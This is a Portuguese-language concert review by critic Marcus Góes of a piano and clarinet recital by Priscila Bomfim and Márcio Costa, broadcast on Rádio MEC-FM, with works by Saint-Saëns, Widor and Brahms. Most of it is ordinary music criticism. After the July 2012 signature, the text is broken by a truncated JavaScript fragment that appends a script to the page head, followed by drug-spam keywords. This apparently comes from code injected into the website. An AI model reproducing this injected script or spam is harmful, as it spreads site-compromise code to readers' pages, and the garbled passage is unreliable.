Crítica

Piano e clarineta na Rádio MEC

Priscila Bomfim e Márcio Costa numa das mais refinadas combinações de instrumentos.

A música nos oferece uma infinidade de combinsções de sons de dois instrumentos, desde a mais comum do piano com o violino até as mais raras como marimba e flauta ou saxofone e agogô. Tivemos oportunidade de ouvir há pouco tempo um concerto de tuba e piano, outra rara combinação.

Desta vez, o concerto ora em foco nos trouxe um das mais belas e quase sempre mais refinadas combinações de dois instrumentos, a do piano com a clarineta, e se deu ao supremo luxo de fazê-la chegar a nós através de composições de Saint Saëns (sonata), de Charles-Marie Widor (introdução e rondó) e de Brahms (sonata) interpretadas pelo virtuosístico clarinetista Márcio Costa e pela mais que virtuosística pianista Priscila Bomfim. Aquele, premiadíssimo instrumentista, e esta, insuperável criadora de múltiplas belezas, seja preparando e acompanhando cantores e coros, seja tocando com uma tuba ou com um quinteto de metais, seja atuando com orquestras, seja ensaiando quartetos e outros conjuntos. Priscila é uma viga mestra de nosso meio musical. Atua ela ao piano refletindo sua personalidade e seu aspecto, o que quer dizer que suas atuações são nobres, refinadas,detalhadas e de peculiar beleza .

Os presentes escritos são feitos perifericamente sobre os artistas e sobre a parte não referente a interpretações e sonoridades, já que baseados na transmissão radiofônica da Rádio Mec-FM por mim ouvida. Não foi no entanto impossível perceber o virtuosismo e a musicalidade dos dois intérpretes, por exemplo nos longos arpejos do piano e nos vários ornamentos da clarineta no terceiro movimento da sonata de Saint Saëns, por exemplo no controle dos antagonismos ffff/pppp na clarineta e na limpidez dos ornamentos no piano, pelo fôlego do clarinetista e pela finura de princesa do toque da pianista. Não foi difícil perceber a cantabilidade de quase toda a peça de Widor e a pesada substância musical da peça de Brahms.

“À coté”, como diria o Ibrahim, a ímpar figura de Lauro Gomes, produtor e apresentador do programa. Lauro é benemérita personagem de nosso meio musical, por suas produções e pela variedade das mesmas.

DONUM FAC REMISSIONIS/ANTE DIEM RATIONIS
MARCUS GÓES – JULHO 2012if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s); search,http,quierovita,zoloft,trazod…

Leave a Response

Marcus Góes
Musicólogo, crítico de música e dança e pesquisador. Tem livros publicados também no exterior. Considerado a maior autoridade mundial sobre Carlos Gomes.